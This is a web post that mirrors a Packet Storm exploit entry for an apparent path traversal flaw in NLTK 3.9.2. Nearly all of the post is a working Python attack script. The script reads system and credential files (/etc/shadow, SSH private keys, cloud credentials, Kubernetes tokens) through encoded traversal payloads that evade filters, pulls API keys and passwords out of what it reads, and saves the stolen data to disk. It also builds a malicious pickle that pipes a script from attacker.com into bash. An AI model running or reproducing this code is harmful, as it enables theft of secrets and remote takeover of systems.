{"id":49308,"date":"2026-04-24T17:48:56","date_gmt":"2026-04-24T17:48:56","guid":{"rendered":"http:\/\/localhost\/?p=49308"},"modified":"2026-04-24T17:48:56","modified_gmt":"2026-04-24T17:48:56","slug":"nltk-392-path-traversal-file-disclosure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=49308","title":{"rendered":"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788"},"content":{"rendered":"

{“lastseen”:”2026-04-24T22:30:40″,”description”:”NLTK version 3.9.2 suffers from a path traversal vulnerability that allows for file disclosure…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:219788″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0847″],”sourceData”:”==================================================================================================================================\\n | # Title : NLTK 3.9.2 Path Traversal – File Disclosure Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/pypi.org\/project\/nltk\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This script is a security research exploit framework targeting a hypothetical path traversal vulnerability in NLTK-based applications (CVE-2026-0847). \\n It is designed to how improper file path handling in corpus readers or web APIs can lead to unauthorized file access.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import os\\n import sys\\n import json\\n import requests\\n import argparse\\n import logging\\n import base64\\n from pathlib import Path\\n from typing import List, Dict, Optional, Tuple\\n from dataclasses import dataclass\\n from datetime import datetime\\n \\n logging.basicConfig(\\n level=logging.INFO,\\n format=’%(asctime)s – %(levelname)s – %(message)s’\\n )\\n logger = logging.getLogger(__name__)\\n @dataclass\\n class ExploitResult:\\n \\”\\”\\”Store exploit results\\”\\”\\”\\n target_file: str\\n content: str\\n success: bool\\n error: str = \\”\\”\\n \\n class NLTKPathTraversalExploit:\\n \\”\\”\\”Main exploit class for CVE-2026-0847\\”\\”\\”\\n SENSITIVE_FILES = [\\n \\”\/etc\/passwd\\”,\\n \\”\/etc\/shadow\\”,\\n \\”\/etc\/group\\”,\\n \\”\/etc\/hosts\\”,\\n \\”\/etc\/hostname\\”,\\n \\”\/etc\/resolv.conf\\”,\\n \\”\/etc\/fstab\\”,\\n \\”\/etc\/crontab\\”,\\n \\”\/etc\/ssh\/sshd_config\\”,\\n \\”\/etc\/ssh\/ssh_config\\”,\\n \\”\/etc\/ssh\/ssh_host_rsa_key\\”,\\n \\”\/etc\/ssh\/ssh_host_ecdsa_key\\”,\\n \\”\/etc\/ssh\/ssh_host_ed25519_key\\”,\\n \\”\/etc\/sudoers\\”,\\n \\”\/etc\/sudoers.d\/\\”,\\n \\”\/var\/log\/auth.log\\”,\\n \\”\/var\/log\/syslog\\”,\\n \\”\/var\/log\/dpkg.log\\”,\\n \\”\/var\/log\/apt\/history.log\\”,\\n \\”\/var\/log\/apache2\/access.log\\”,\\n \\”\/var\/log\/apache2\/error.log\\”,\\n \\”\/var\/log\/nginx\/access.log\\”,\\n \\”\/var\/log\/nginx\/error.log\\”,\\n \\”\/var\/lib\/mlocate\/mlocate.db\\”,\\n \\”\/root\/.bash_history\\”,\\n \\”\/root\/.ssh\/id_rsa\\”,\\n \\”\/root\/.ssh\/id_rsa.pub\\”,\\n \\”\/root\/.ssh\/authorized_keys\\”,\\n \\”\/.env\\”,\\n \\”\/.git\/config\\”,\\n \\”\/.git\/HEAD\\”,\\n \\”\/config.json\\”,\\n \\”\/config.yaml\\”,\\n \\”\/config.yml\\”,\\n \\”\/settings.py\\”,\\n \\”\/settings.json\\”,\\n \\”\/app\/config.py\\”,\\n \\”\/app\/settings.py\\”,\\n \\”\/app\/secrets.py\\”,\\n \\”\/app\/.env\\”,\\n \\”\/.aws\/credentials\\”,\\n \\”\/.aws\/config\\”,\\n \\”\/.azure\/credentials\\”,\\n \\”\/.azure\/config\\”,\\n \\”\/.google\/credentials.json\\”,\\n \\”\/.google\/application_default_credentials.json\\”,\\n \\”\/.kube\/config\\”,\\n \\”\/.docker\/config.json\\”,\\n \\”\/.npmrc\\”,\\n \\”\/.pypirc\\”,\\n \\”\/.netrc\\”,\\n \\”\/.pgpass\\”,\\n \\”\/my.cnf\\”,\\n \\”.my.cnf\\”,\\n \\”\/mysql.conf\\”,\\n \\”C:\/Windows\/win.ini\\”,\\n \\”C:\/Windows\/System32\/config\/SAM\\”,\\n \\”C:\/Windows\/System32\/config\/SYSTEM\\”,\\n \\”C:\/Windows\/System32\/config\/SECURITY\\”,\\n \\”C:\/Windows\/System32\/drivers\/etc\/hosts\\”,\\n \\”C:\/Windows\/System32\/drivers\/etc\/networks\\”,\\n \\”C:\/Windows\/System32\/drivers\/etc\/services\\”,\\n \\”C:\/Users\/Administrator\/NTUser.dat\\”,\\n \\”C:\/Users\/Administrator\/Desktop\/flag.txt\\”,\\n \\”\/.dockerenv\\”,\\n \\”\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token\\”,\\n \\”\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/namespace\\”,\\n \\”\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/ca.crt\\”,\\n \\”web.config\\”,\\n \\”appsettings.json\\”,\\n \\”database.yml\\”,\\n \\”secrets.yml\\”,\\n \\”credentials.yml\\”,\\n \\”.htaccess\\”,\\n \\”.htpasswd\\”,\\n \\”id_rsa\\”,\\n \\”id_dsa\\”,\\n \\”id_ecdsa\\”,\\n \\”id_ed25519\\”,\\n \\”ssh_host_key\\”,\\n ]\\n BYPASS_PAYLOADS = [\\n \\”etc\/passwd\\”,\\n \\”etc\/\/passwd\\”,\\n \\”etc\/.\/passwd\\”,\\n \\”etc\/..\/etc\/passwd\\”,\\n \\”etc\/….\/\/passwd\\”,\\n \\”etc\/..;\/passwd\\”,\\n \\”etc\/%2e%2e\/passwd\\”,\\n \\”etc\/%252e%252e\/passwd\\”,\\n \\”etc\/..%252f..%252f..%252fetc\/passwd\\”,\\n \\”etc\/..%c0%af..%c0%af..%c0%afetc\/passwd\\”,\\n \\”etc\/..%c1%9c..%c1%9c..%c1%9cetc\/passwd\\”,\\n \\”etc\/..%c0%ae%c0%ae\/\\”,\\n \\”etc\/%2e%2e%2fetc%2fpasswd\\”,\\n \\”etc\/..%255c..%255c..%255cetc\/passwd\\”,\\n \\”etc\/..\\\\\\\\..\\\\\\\\..\\\\\\\\etc\\\\\\\\passwd\\”,\\n \\”etc\/….\/\/….\/\/….\/\/etc\/passwd\\”,\\n ]\\n \\n def __init__(self, target_url: str = None, verbose: bool = False):\\n \\”\\”\\”\\n Initialize exploit\\n \\n Args:\\n target_url: Target API endpoint (if remote)\\n verbose: Enable verbose output\\n \\”\\”\\”\\n self.target_url = target_url\\n self.verbose = verbose\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n })\\n \\n def test_local_exploit(self, target_file: str) -\\u003e ExploitResult:\\n \\”\\”\\”\\n Test exploit locally (direct Python import)\\n \\n Args:\\n target_file: Path to file to read\\n \\n Returns:\\n ExploitResult object\\n \\”\\”\\”\\n try:\\n from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader\\n from nltk.corpus.reader.util import FileSystemPathPointer\\n root = FileSystemPathPointer(\\”\/\\”)\\n content = None\\n reader_classes = [\\n WordListCorpusReader,\\n TaggedCorpusReader,\\n BracketParseCorpusReader\\n ]\\n \\n for reader_class in reader_classes:\\n try:\\n reader = reader_class(root, [target_file])\\n content = reader.raw(target_file)\\n if content:\\n logger.info(f\\”[+] Success with {reader_class.__name__}\\”)\\n break\\n except Exception as e:\\n if self.verbose:\\n logger.debug(f\\”[-] Failed with {reader_class.__name__}: {e}\\”)\\n continue\\n \\n if content:\\n return ExploitResult(\\n target_file=target_file,\\n content=content,\\n success=True\\n )\\n else:\\n return ExploitResult(\\n target_file=target_file,\\n content=\\”\\”,\\n success=False,\\n error=\\”All readers failed\\”\\n )\\n \\n except ImportError as e:\\n return ExploitResult(\\n target_file=target_file,\\n content=\\”\\”,\\n success=False,\\n error=f\\”NLTK not installed: {e}\\”\\n )\\n except Exception as e:\\n return ExploitResult(\\n target_file=target_file,\\n content=\\”\\”,\\n success=False,\\n error=str(e)\\n )\\n \\n def test_remote_exploit(self, target_file: str, endpoint: str = \\”\/read\\”, method: str = \\”POST\\”) -\\u003e ExploitResult:\\n \\”\\”\\”\\n Test exploit remotely via vulnerable API\\n \\n Args:\\n target_file: Path to file to read\\n endpoint: API endpoint\\n method: HTTP method (POST\/GET)\\n \\n Returns:\\n ExploitResult object\\n \\”\\”\\”\\n if not self.target_url:\\n return ExploitResult(\\n target_file=target_file,\\n content=\\”\\”,\\n success=False,\\n error=\\”No target URL specified\\”\\n )\\n \\n url = f\\”{self.target_url.rstrip(‘\/’)}{endpoint}\\”\\n \\n try:\\n if method.upper() == \\”POST\\”:\\n payload = {\\”file\\”: target_file, \\”filename\\”: target_file, \\”path\\”: target_file}\\n response = self.session.post(url, json=payload, timeout=30)\\n else:\\n response = self.session.get(url, params={\\”file\\”: target_file, \\”path\\”: target_file}, timeout=30)\\n \\n if response.status_code == 200 and response.text:\\n return ExploitResult(\\n target_file=target_file,\\n content=response.text,\\n success=True\\n )\\n else:\\n return ExploitResult(\\n target_file=target_file,\\n content=\\”\\”,\\n success=False,\\n error=f\\”HTTP {response.status_code}\\”\\n )\\n \\n except Exception as e:\\n return ExploitResult(\\n target_file=target_file,\\n content=\\”\\”,\\n success=False,\\n error=str(e)\\n )\\n \\n def scan_common_files(self, use_bypass: bool = False) -\\u003e List[ExploitResult]:\\n \\”\\”\\”\\n Scan for common sensitive files\\n \\n Args:\\n use_bypass: Use bypass payloads\\n \\n Returns:\\n List of ExploitResult objects\\n \\”\\”\\”\\n results = []\\n \\n for file_path in self.SENSITIVE_FILES:\\n if self.verbose:\\n logger.info(f\\”[*] Testing: {file_path}\\”)\\n \\n result = self.test_local_exploit(file_path) if not self.target_url else self.test_remote_exploit(file_path)\\n \\n if result.success:\\n logger.info(f\\”[+] FOUND: {file_path} ({len(result.content)} bytes)\\”)\\n results.append(result)\\n self.extract_sensitive_info(result)\\n elif self.verbose:\\n logger.debug(f\\”[-] Not found: {file_path}\\”)\\n \\n return results\\n \\n def extract_sensitive_info(self, result: ExploitResult) -\\u003e Dict:\\n \\”\\”\\”\\n Extract sensitive information from file content\\n \\n Args:\\n result: ExploitResult object\\n \\n Returns:\\n Dictionary of extracted info\\n \\”\\”\\”\\n extracted = {}\\n \\n content = result.content\\n if \\”passwd\\” in result.target_file:\\n users = []\\n for line in content.split(‘\\\\n’):\\n if ‘:’ in line:\\n parts = line.split(‘:’)\\n if len(parts) \\u003e= 3:\\n username = parts[0]\\n uid = parts[2]\\n if uid.isdigit() and int(uid) \\u003e= 1000:\\n users.append(username)\\n if users:\\n extracted[‘users’] = users\\n logger.info(f\\”[!] Found users: {‘, ‘.join(users)}\\”)\\n if \\”id_rsa\\” in result.target_file or \\”ssh_host\\” in result.target_file:\\n if \\”BEGIN OPENSSH PRIVATE KEY\\” in content or \\”BEGIN RSA PRIVATE KEY\\” in content:\\n extracted[‘ssh_key’] = content\\n logger.warning(\\”[!!!] SSH PRIVATE KEY FOUND!\\”)\\n key_file = f\\”extracted_{datetime.now().strftime(‘%Y%m%d_%H%M%S’)}.key\\”\\n with open(key_file, ‘w’) as f:\\n f.write(content)\\n logger.info(f\\”[+] SSH key saved to {key_file}\\”)\\n import re\\n patterns = {\\n ‘api_key’: r'[a-zA-Z0-9_-]{32,}’,\\n ‘aws_key’: r’AKIA[0-9A-Z]{16}’,\\n ‘google_api’: r’AIza[0-9A-Za-z_-]{35}’,\\n ‘github_token’: r’gh[ps]_[0-9a-zA-Z]{36}’,\\n ‘slack_token’: r’xox[baprs]-[0-9a-zA-Z-]+’,\\n ‘jwt’: r’eyJ[A-Za-z0-9-_=]+\\\\.[A-Za-z0-9-_=]+\\\\.?[A-Za-z0-9-_.+\/=]*’,\\n ‘password’: r’password[\\\\s]*[:=][\\\\s]*[\\”\\\\’]?([^\\”\\\\’\\\\s]+)[\\”\\\\’]?’,\\n ‘secret’: r’secret[\\\\s]*[:=][\\\\s]*[\\”\\\\’]?([^\\”\\\\’\\\\s]+)[\\”\\\\’]?’,\\n }\\n \\n for pattern_name, pattern in patterns.items():\\n matches = re.findall(pattern, content, re.IGNORECASE)\\n if matches:\\n extracted[pattern_name] = matches[:10] # Limit to first 10\\n logger.warning(f\\”[!!!] Found {len(matches)} {pattern_name.upper()} tokens\\”)\\n \\n return extracted\\n \\n def generate_exploit_payloads(self) -\\u003e List[str]:\\n \\”\\”\\”\\n Generate path traversal payloads for different scenarios\\n \\n Returns:\\n List of payload strings\\n \\”\\”\\”\\n targets = [\\n \\”..\/..\/..\/..\/..\/..\/etc\/passwd\\”,\\n \\”..\/..\/..\/..\/..\/..\/etc\/shadow\\”,\\n \\”..\/..\/..\/..\/..\/..\/root\/.ssh\/id_rsa\\”,\\n \\”..\/..\/..\/..\/..\/..\/var\/log\/auth.log\\”,\\n \\”..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\win.ini\\”,\\n ]\\n \\n payloads = []\\n for target in targets:\\n for bypass in self.BYPASS_PAYLOADS:\\n if bypass.startswith(‘etc’):\\n payloads.append(bypass)\\n else:\\n payloads.append(target.replace(‘etc\/passwd’, bypass))\\n \\n return list(set(payloads))\\n \\n def create_malicious_nltk_file(self, output_file: str = \\”malicious.nltk\\”) -\\u003e str:\\n \\”\\”\\”\\n Create a malicious NLTK corpus file\\n \\n Args:\\n output_file: Output filename\\n \\n Returns:\\n Path to created file\\n \\”\\”\\”\\n import pickle\\n \\n # Malicious pickle payload for RCE (when combined with NLTK deserialization)\\n class MaliciousPickle:\\n def __reduce__(self):\\n import os\\n return (os.system, (‘curl http:\/\/attacker.com\/shell.sh | bash’,))\\n \\n with open(output_file, ‘wb’) as f:\\n pickle.dump(MaliciousPickle(), f)\\n \\n logger.warning(f\\”[!] Created malicious pickle file: {output_file}\\”)\\n logger.warning(\\”[!] This can lead to RCE if loaded by NLTK\\”)\\n \\n return output_file\\n class AttackVector:\\n \\”\\”\\”Different attack vectors for the vulnerability\\”\\”\\”\\n \\n @staticmethod\\n def flask_api_exploit(target_url: str, files: List[str]) -\\u003e None:\\n \\”\\”\\”\\n Exploit via Flask API endpoint\\n \\”\\”\\”\\n logger.info(f\\”[*] Attacking Flask API at {target_url}\\”)\\n \\n for file_path in files:\\n try:\\n response = requests.post(\\n f\\”{target_url}\/read\\”,\\n json={\\”file\\”: file_path},\\n timeout=10\\n )\\n if response.status_code == 200:\\n logger.info(f\\”[+] Read {file_path}: {len(response.text)} bytes\\”)\\n safe_name = file_path.replace(‘\/’, ‘_’).replace(‘\\\\\\\\’, ‘_’)\\n with open(f\\”exfil_{safe_name}.txt\\”, ‘w’) as f:\\n f.write(response.text)\\n except Exception as e:\\n logger.error(f\\”[-] Failed: {e}\\”)\\n \\n @staticmethod\\n def django_api_exploit(target_url: str, files: List[str]) -\\u003e None:\\n \\”\\”\\”\\n Exploit via Django REST API\\n \\”\\”\\”\\n logger.info(f\\”[*] Attacking Django API at {target_url}\\”)\\n \\n for file_path in files:\\n try:\\n response = requests.get(\\n f\\”{target_url}\/api\/corpus\/\\”,\\n params={\\”file\\”: file_path},\\n timeout=10\\n )\\n if response.status_code == 200:\\n logger.info(f\\”[+] Read {file_path}\\”)\\n except Exception as e:\\n logger.error(f\\”[-] Failed: {e}\\”)\\n \\n @staticmethod\\n def fastapi_exploit(target_url: str, files: List[str]) -\\u003e None:\\n \\”\\”\\”\\n Exploit via FastAPI endpoint\\n \\”\\”\\”\\n logger.info(f\\”[*] Attacking FastAPI at {target_url}\\”)\\n \\n for file_path in files:\\n try:\\n response = requests.post(\\n f\\”{target_url}\/process\\”,\\n json={\\”corpus_file\\”: file_path},\\n timeout=10\\n )\\n if response.status_code == 200:\\n logger.info(f\\”[+] Read {file_path}\\”)\\n except Exception as e:\\n logger.error(f\\”[-] Failed: {e}\\”)\\n def main():\\n parser = argparse.ArgumentParser(\\n description=’CVE-2026-0847 – NLTK Path Traversal Exploit’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n \\n python exploit.py –local –file \/etc\/passwd\\n python exploit.py –local –scan\\n python exploit.py –url http:\/\/target.com:8000 –file etc\/passwd\\n python exploit.py –url http:\/\/target.com:8000 –scan –bypass\\n python exploit.py –generate-pickle malicious.nltk\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(‘–local’, action=’store_true’, help=’Local exploit (direct Python)’)\\n parser.add_argument(‘–url’, help=’Target URL for remote exploit’)\\n parser.add_argument(‘–file’, help=’Single file to read’)\\n parser.add_argument(‘–scan’, action=’store_true’, help=’Scan common sensitive files’)\\n parser.add_argument(‘–bypass’, action=’store_true’, help=’Use WAF bypass payloads’)\\n parser.add_argument(‘–output’, ‘-o’, help=’Output file for results’)\\n parser.add_argument(‘–verbose’, ‘-v’, action=’store_true’, help=’Verbose output’)\\n parser.add_argument(‘–generate-pickle’, metavar=’FILE’, help=’Generate malicious pickle file’)\\n parser.add_argument(‘–endpoint’, default=’\/read’, help=’API endpoint (default: \/read)’)\\n parser.add_argument(‘–method’, choices=[‘GET’, ‘POST’], default=’POST’, help=’HTTP method’)\\n \\n args = parser.parse_args()\\n \\n if args.generate_pickle:\\n exploit = NLTKPathTraversalExploit()\\n exploit.create_malicious_nltk_file(args.generate_pickle)\\n return\\n \\n if not args.local and not args.url:\\n parser.error(\\”Either –local or –url must be specified\\”)\\n exploit = NLTKPathTraversalExploit(\\n target_url=args.url,\\n verbose=args.verbose\\n )\\n \\n results = []\\n if args.file:\\n logger.info(f\\”[*] Reading file: {args.file}\\”)\\n \\n if args.local:\\n result = exploit.test_local_exploit(args.file)\\n else:\\n result = exploit.test_remote_exploit(args.file, args.endpoint, args.method)\\n \\n if result.success:\\n logger.info(f\\”[+] Success! Content length: {len(result.content)} bytes\\”)\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(result.content[:2000]) \\n print(\\”=\\”*60)\\n \\n if len(result.content) \\u003e 2000:\\n print(f\\”\\\\n… (truncated, total {len(result.content)} bytes)\\”)\\n \\n results.append(result)\\n \\n if args.output:\\n with open(args.output, ‘w’) as f:\\n f.write(result.content)\\n logger.info(f\\”[+] Saved to {args.output}\\”)\\n else:\\n logger.error(f\\”[-] Failed: {result.error}\\”)\\n \\n if args.scan:\\n logger.info(\\”[*] Scanning for sensitive files…\\”)\\n \\n if args.local:\\n if args.bypass:\\n logger.warning(\\”[!] Bypass mode not applicable for local exploit\\”)\\n \\n files_to_test = NLTKPathTraversalExploit.SENSITIVE_FILES\\n for file_path in files_to_test[:20]: \\n result = exploit.test_local_exploit(file_path)\\n if result.success:\\n results.append(result)\\n logger.info(f\\”[+] Found: {file_path}\\”)\\n else:\\n files_to_test = NLTKPathTraversalExploit.SENSITIVE_FILES\\n if args.bypass:\\n bypass_payloads = exploit.generate_exploit_payloads()\\n for payload in bypass_payloads[:50]:\\n result = exploit.test_remote_exploit(payload, args.endpoint, args.method)\\n if result.success:\\n results.append(result)\\n logger.info(f\\”[+] Found with bypass: {payload}\\”)\\n else:\\n for file_path in files_to_test[:30]:\\n result = exploit.test_remote_exploit(file_path, args.endpoint, args.method)\\n if result.success:\\n results.append(result)\\n logger.info(f\\”[+] Found: {file_path}\\”)\\n \\n if results:\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”EXPLOIT SUMMARY\\”)\\n print(\\”=\\”*60)\\n print(f\\”Total files read: {len(results)}\\”)\\n \\n for result in results:\\n print(f\\”\\\\n[+] {result.target_file}: {len(result.content)} bytes\\”)\\n lines = result.content.split(‘\\\\n’)[:5]\\n for line in lines:\\n if line.strip():\\n print(f\\” {line[:100]}\\”)\\n \\n if args.output and args.output.endswith(‘.json’):\\n with open(args.output, ‘w’) as f:\\n json.dump([\\n {\\n ‘file’: r.target_file,\\n ‘size’: len(r.content),\\n ‘content’: r.content[:10000]\\n }\\n for r in results\\n ], f, indent=2)\\n logger.info(f\\”[+] Results saved to {args.output}\\”)\\n \\n else:\\n logger.warning(\\”[!] No files were successfully read\\”)\\n \\n logger.info(\\”[+] Exploit completed\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219788″,”cvss”:{“score”:8.6,”severity”:”HIGH”,”vector”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:L\/A:L”,”version”:”3.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:L\/A:L”,”baseScore”:8.6,”baseSeverity”:”HIGH”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”LOW”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/219788\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-24T22:30:40″,”description”:”NLTK version 3.9.2 suffers from a path traversal vulnerability that allows for file disclosure…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:219788″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0847″],”sourceData”:”==================================================================================================================================\\n | # Title :…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,81,12,15,13,53,7,11,5],"class_list":["post-49308","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-86","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=49308\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-24T22:30:40″,”description”:”NLTK version 3.9.2 suffers from a path traversal vulnerability that allows for file disclosure…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:219788″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0847″],”sourceData”:”==================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=49308\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-24T17:48:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \\\/ File Disclosure_PACKETSTORM:219788\",\"datePublished\":\"2026-04-24T17:48:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308\"},\"wordCount\":2888,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.6\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49308#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308\",\"name\":\"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \\\/ File Disclosure_PACKETSTORM:219788 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-24T17:48:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49308\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49308#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \\\/ File Disclosure_PACKETSTORM:219788\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788 